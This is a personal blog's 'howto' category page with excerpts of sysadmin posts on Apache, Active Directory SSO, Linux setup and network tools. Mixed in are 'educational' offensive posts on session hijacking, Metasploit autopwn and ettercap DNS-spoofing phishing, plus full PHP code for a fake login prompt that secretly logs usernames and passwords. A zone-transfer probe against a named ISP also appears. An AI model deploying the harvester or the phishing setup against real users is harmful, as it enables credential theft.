
howto

This category contains 26 posts

Web based Session Hijacking attacks

Session hijacking means that an interceptor has used a man-in-the-middle attack to steal session-dependent attributes (like cookies) of an unsuspecting user who logs in to a web site, so as to get unauthorised access and browse private content. I don’t encourage computer hacking as it is illegal, but I write this article for educational purposes … Continue reading

Using m0n0wall to Create a WiFi Captive Portal

m0n0wall is a very powerful firewall based on FreeBSD. For the Captive Portal setup, I used: 1. a diskless PC with 2x Ethernet ports 2. an Access Point 3. a Broadband ADSL+2 router 4. a switch 5. a compact flash card (from my Canon IXUS :) 6. my Linux laptop to flash the image on … Continue reading

Linux & ZTE MF680 – 3G NW HSPA+ Wireless Modem

COSMOTE’s Internet On The Go 3G Service promises high-speed mobile Internet (42,2 Mbps downlink, 5,8 Mbps uplink). See my setup just below:
root@pilio-laptop:~# cat /etc/wvdial.conf
[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","internet"
Modem Type = Analog Modem
Baud = 42000000
New PPPD = … Continue reading

How to Increase the Entropy in Linux

The Linux kernel generates entropy from keyboard timings, mouse movements and IDE timings and makes the random character data available to other operating system processes through the special files /dev/random and /dev/urandom. On my laptop the entropy is around 178. Many times I have got the following message when I try to generate a security … Continue reading

Green Technology – Computing

You want to save money on Electricity? Use Green Technology! I have successfully implemented the Wake-On-LAN standard over Internet. Now you don’t need to leave your computer on continuously so that you are able to access it remotely. I can help you conserve energy and save money as well. How it Works; … In the … Continue reading

How to use the Metasploit Framework

This is for educational purposes only! This howto shows how to gain access to a remote PC (Windows XP Pro SP2) by exploiting a known vulnerability with the autopwn tool.
Installation Howto (Ubuntu)
$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby
$ sudo apt-get install libreadline-ruby irb ri rubygems
$ sudo apt-get install subversion … Continue reading

How Phishing Works along with DNS Spoofing

This is for educational purposes only! This post describes how phishing works. Many howtos exist on the Internet, but they don’t do the job silently and the victim understands that something goes wrong … Attacker’s side IP: 192.168.1.4 1. Install ettercap 2. Install Apache with PHP support 3. Make sure with the ping command that facebook.com points to 192.168.1.4 or … Continue reading

Opensource IT Security Solutions

Implementation of SSO (Single-Sign-On) procedures according to ADAE’s Requirements for Telcos, ISPs, Banks, etc. SSO Apache Authentication Against Active Directory, SSO Proxy Squid Authentication Against Active Directory, SSO vsftpd Authentication Against Active Directory. Web Content Filtering and Anti Virus Services. Integration of OpenSSH with OpenLDAP, Kerberos, Active Directory standards (SSO) with full logging and replay … Continue reading

How to Authenticate against Facebook using Perl

#!/usr/bin/perl -w
#How to Authenticate against Facebook using Perl
#coded by Panagiotis Iliopoulos 20/2/2011
#apt-get install libcrypt-ssleay-perl
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
my $fname="fbkCookies.dat";
if (-e $fname) { unlink $fname;}
my $email='user@domain name';
my $password="yourpassword";
my $user_agent = 'Mozilla/5.0 (Linux; U; Android 2.2; en-us; Ideos Build/FRF91) AppleWebKit/533.1 Mobile Safari/533.1';
my %postLoginData=(        … Continue reading

The Web Server is not sending the required intermediate certificate through a SECURE HTTPS Session

Some system admins forget to configure the intermediate certificate, and the SSL handshake between the browser and the web server returns "Verify return code: 21 (unable to verify the first certificate)" and not "Verify return code: 0 (ok)".
# openssl s_client -connect www.vivodi.gr:443 -state
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 1024 bit
SSL-Session: … Continue reading

A Simple PHP Authenticator which logs users’ usernames and passwords

<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
    header('WWW-Authenticate: Basic realm="Restricted Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo '401 Unauthorized';
    exit;
} else {
    $a=$_SERVER['PHP_AUTH_USER'];
    $b=$_SERVER['PHP_AUTH_PW'];
    $myFile = "./testFile.txt";
    $fh = fopen($myFile, 'a') or die("ferror!!!");
    fwrite($fh, $a);
    fwrite($fh,"\n");
    fwrite($fh, $b);
    fwrite($fh,"\n");
    fwrite($fh,"-------------------\n");
    fclose($fh);
    header('WWW-Authenticate: Basic realm="Restricted Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo '401 Unauthorized';
    exit;
}
?>
# tail -f testFile.txt
------------------- … Continue reading

Installation of SUN JAVA Under RHEL

0. Download JAVA and run the installer. Java can be downloaded through the http://java.sun.com/products/archive/ link.
# cd /opt
# chmod +x jdk-6u11-linux-x64.bin
# script -a jdk_installation.txt
# ./jdk-6u11-linux-x64.bin
# exit
1. # rm /usr/bin/java
2. # test -L /usr/local/java && mv /usr/local/java /usr/local/java_orig_system
3. # find /usr/local -maxdepth 1 -type d -name "j2sdk*" -exec rm -r {} \;
4. # find /usr/local -maxdepth 1 -type d -name "jdk?.*" … Continue reading

Using Pen, mod_rewrite and mod_proxy Apache modules to perform selective url based loadbalancing/fail-over with “n” backend servers

1. Download Pen through the following link: http://siag.nu/pen/
2. Raise the file descriptor limits by editing /usr/include/linux/posix_types.h and /usr/include/bits/typesizes.h as follows:
change: #define __FD_SETSIZE 1024
to: #define __FD_SETSIZE 10240
and then compile Pen.
3. Launch Pen as follows:
./pen -x 5000 -d -d -f 8280 server1:8280 server2:8280
4. Apache configuration
RewriteEngine on … Continue reading

SUN’s JES (DSSE, Access Manager) Prerequisite Linux Packages

Prerequisites:
1) pam-devel.i386
2) pam.i386
3) compat-libstdc++-33.i386
4) libgcc.i386
5) zlib.i386

1. yum install pam-devel.i386
Dependencies Resolved
==========================================================================
Package Arch Version Repository Size
==========================================================================
Installing:
pam-devel i386 0.77-66.25 myrepo 85 k
Transaction Summary
==========================================================================
2. yum install pam.i386
Dependencies Resolved
==========================================================================
Package Arch Version Repository Size
==========================================================================
Installing:
pam i386 0.77-66.25 myrepo 1.9 M
Installing for dependencies: … Continue reading

How to create a Local YUM Repository for RHEL 5.3, RHAS 4.7

1. Local YUM Repository for RHEL 5.3
# cd /etc/yum.repos.d
# cat iso.repo
[myrepo]
name=myrepo
baseurl=file:///mnt
enabled=1
gpgcheck=0
#
# mkdir /mnt/RHEL5.3
# cd /root/myrepo/
# mount -o loop /root/myrepo/rhel-server-5.3-x86_64-dvd.iso /mnt/RHEL5.3
# rpm -Uvh createrepo*
warning: createrepo-0.4.8-1.el5.rf.noarch.rpm: Header V3 DSA signature: NOKEY, key ID 6b8d79e6
Preparing... ########################################### [100%]
1:createrepo ########################################### [100%]
#
# cd /mnt/ … Continue reading

Apache seems to be eating RAM – How to reduce the memory footprint of apache using an alternative Apache other than Linux’s Pre-Packaged

# ./configure \
    --with-included-apr \
    --prefix=/opt/apache_worker \
    --with-mpm=worker --enable-so \
    --enable-unique-id \
    --enable-proxy --enable-proxy-http --enable-proxy-ftp \
    --enable-proxy-ajp --enable-proxy-balancer \
    --enable-rewrite --enable-headers --enable-setenvif \
    --enable-logio \
    --enable-expires \
    --enable-ssl \
    --enable-deflate --enable-cache --enable-file-cache --enable-mem-cache --enable-disk-cache \
    --disable-autoindex --disable-asis --disable-cgi --disable-cgid \
    --disable-negotiation --disable-userdir
# make && make install

MySQL Driven Apache NCSA Log Parser – Linux ANSI C (gcc)

mysql> desc apacheLog;
+---------+--------------+------+-----+---------+-------+
| Field   | Type         | Null | Key | Default | Extra |
+---------+--------------+------+-----+---------+-------+
| myDATE  | datetime     | NO   |     | NULL    |       |
| hosts   | varchar(255) | NO   |     | NULL    |       |
| method  | char(4)      | NO   |     | NULL    |       |
| url     | varchar(255) … Continue reading

Encrypted Volumes under Linux / Windows

1. Under Linux use the following procedure:
# modprobe aes
# modprobe twofish
# modprobe cryptoloop
# mkdir $HOME/crypto
# dd if=/dev/urandom of=$HOME/crypto/container.aes bs=1k count=102400
# LOOPDEV=$( losetup -f )
# echo "Our loop device is '$LOOPDEV'"
# losetup -e aes $LOOPDEV $HOME/crypto/container.aes    (insert a strong passphrase)
# mkfs.ext3 -m 0 $LOOPDEV
# tune2fs -i … Continue reading

How to transmit/receive ASCII/BINARY data between 2 hosts using netcat and file descriptors

//Server Side//
[root@node1]# nc -l -p 8080 -vvvvv
listening on [any] 8080 ...
//Client Side//
[root@node2]# exec 5<>/dev/tcp/192.168.1.67/8080
[root@node2]# echo "this is a test" >&5
[root@node2]# echo "this is a test" | openssl base64 -e >&5

keepalived with VRRP and LVS Support under RHEL 5.3 x86_64

# yum -y install kernel-devel
# yum install openssl-devel
# wget http://www.keepalived.org/software/keepalived-1.1.17.tar.gz
# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.18.8.tar.gz
# tar zxvf linux-2.6.18.8.tar.gz
# cp -r linux-2.6.18.8/net/core /lib/modules/2.6.18-128.el5/build/net/
# ./configure --with-kernel-dir=/lib/modules/2.6.18-128.el5/build
Keepalived configuration
------------------------
Keepalived version : 1.1.17
Compiler : gcc
Compiler flags : -g -O2
Extra Lib : -lpopt -lssl -lcrypto
Use IPVS Framework : Yes
IPVS sync … Continue reading

Authenticate Apache Against Active Directory (SSO) – Eponymous LDAP Bind

// Apache Module //
LoadModule authz_ldap_module modules/mod_authz_ldap.so
// Apache Module //
[Directory "/var/www/html"]
AuthType Basic
# What the users will see as a "title" of the login prompt:
AuthName "Domain Credentials Required"
# use plain LDAP authentication:
AuthzLDAPMethod ldap
# FQDN resolvable hostname (or IP) of the Windows
# AD domain controller:
AuthzLDAPServer 192.168.1.67
# … Continue reading

Authenticate SQUID PROXY against Active Directory (SSO)

Prerequisites:
1) Samba / Winbind sw
2) Kerberos Libraries
3) System is joined to the Active Directory
4) Squid Package

Squid configuration:
auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp
auth_param ntlm children 30
auth_param ntlm max_challenge_reuses 0
auth_param ntlm max_challenge_lifetime 2 minutes
auth_param ntlm use_ntlm_negotiate on
auth_param basic program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-basic
auth_param basic children 5
auth_param basic … Continue reading

Apache PKI Implementation

# openssl pkcs12 -clcerts -export -inkey server.key -in server.crt -out clientKey.p12
# openssl pkcs12 -clcerts -nokeys -in clientKey.p12 -out CA_pilio.crt.pem
# cp CA_pilio.crt.pem CA_pilio.crt
// Apache SSL Configuration //
SSLVerifyClient require
SSLVerifyDepth 1
SSLCACertificateFile /etc/pki/tls/certs/CA_pilio.crt
// Apache SSL Configuration //
The clientKey.p12 client SSL key must be loaded in your web browser.

How to fetch user’s SMIME certificate (Public Key) from Active Directory (eponymous bind) using Perl

#!/usr/bin/perl
use Net::LDAP;
use IO::File;
binmode STDOUT;
my $CREATE_CERT = new IO::File "> /tmp/mycert.cer";
$ldap = Net::LDAP->new('10.20.0.145') or die "Could not connect: $@";
$result = $ldap->bind('CN= bind_usr ,OU=System Administrators,OU=Project Management & Support Dpt,OU=Systems Technical Division,OU=EMPLOYEES,DC=CONTOSO,DC=MSFT',password =>'mypass');
die $result->error if $result->code;
# do stuff
$search = $ldap->search(base=>'OU=EMPLOYEES,DC=CONTOSO,DC=MSFT',scope=>'subtree',filter=>'(&(objectclass=user)(objectcategory=Person))');
die $search->error if $search->code;
print "Total entries returned: ",$search->count,"\n"; … Continue reading

HOL GREEK ISP – DNS Misconfiguration Issue

It seems that HOL is vulnerable to DNS AXFR zone transfer for primary, secondary and tertiary domain zones (forward / reverse zones) from unauthorized IP networks!
# dig @ns1.hol.gr hol.gr -t AXFR
; <<>> DiG 9.5.1-P2 <<>> @ns1.hol.gr hol.gr -t AXFR
; (1 server found)
;; global options: printcmd
hol.gr. 7200 IN SOA ns0.hol.gr. hostmaster.hol.gr. … Continue reading

sample integrations

Samples …